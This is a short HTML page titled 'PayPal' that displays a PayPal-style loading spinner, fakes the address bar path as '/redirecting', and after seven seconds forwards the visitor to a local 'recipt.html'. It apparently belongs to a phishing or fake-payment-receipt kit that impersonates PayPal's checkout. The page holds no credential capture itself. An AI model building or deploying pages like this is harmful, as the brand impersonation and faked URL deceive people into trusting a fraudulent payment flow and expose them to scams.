<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>PayPal</title>
    <link rel="shortcut icon" href="faviconV2.png" type="image/x-icon">
</head>
<style>
    .loading #main {
  opacity: .1
}
.spinner {
  height: 100%;
  width: 100%;
  position: absolute;
  z-index: 10
}
.spinner .spinWrap {
  width: 200px;
  height: 100px;
  position: absolute;
  top: 50%;
  left: 50%;
  margin-left: -100px;
  margin-top: -50px
}
.spinner .loader,
.spinner .spinnerImage {
  height: 100px;
  width: 100px;
  position: absolute;
  top: 0;
  left: 50%;
  opacity: 1;
  filter: alpha(opacity=100)
}
.spinner .spinnerImage {
  margin: 28px 0 0 -25px;
  background: url(https://www.paypalobjects.com/images/checkout/hermes/icon_ot_spin_lock_skinny.png) no-repeat
}
.spinner .loader {
  margin: 0 0 0 -55px;
  background-color: transparent;
  -webkit-animation: rotation .7s infinite linear;
  -moz-animation: rotation .7s infinite linear;
  -o-animation: rotation .7s infinite linear;
  animation: rotation .7s infinite linear;
  border-left: 5px solid #cbcbca;
  border-right: 5px solid #cbcbca;
  border-bottom: 5px solid #cbcbca;
  border-top: 5px solid #2380be;
  border-radius: 100%
}
.spinner .loadingMessage {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  -ms-box-sizing: border-box;
  box-sizing: border-box;
  width: 100%;
  margin-top: 125px;
  text-align: center;
  z-index: 100;
  outline: 0
}
.spinner .loadingSubHeading {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  -ms-box-sizing: border-box;
  box-sizing: border-box;
  width: 150%;
  margin-top: 10px;
  margin-left: -42px;
  text-align: center;
  z-index: 100;
  outline: 0
}
@-webkit-keyframes rotation {
  from {
    -webkit-transform: rotate(0)
  }
  to {
    -webkit-transform: rotate(359deg)
  }
}
@-moz-keyframes rotation {
  from {
    -moz-transform: rotate(0)
  }
  to {
    -moz-transform: rotate(359deg)
  }
}
@-o-keyframes rotation {
  from {
    -o-transform: rotate(0)
  }
  to {
    -o-transform: rotate(359deg)
  }
}
@keyframes rotation {
  from {
    transform: rotate(0)
  }
  to {
    transform: rotate(359deg)
  }
}
</style>
<body>
    


    <div id="spinner" class="spinner">
        <div class="spinWrap">
     
            <p class="loader"></p>
            <p id="spinner-message" tabindex="0" role="alert" 
        </div>
    </div>
</body>
</html>
<script>
    setTimeout(function() {
        window.location.href = "recipt.html";
    }, 7000); // 7 seconds

    window.history.pushState({}, '', '/redirecting');

</script>
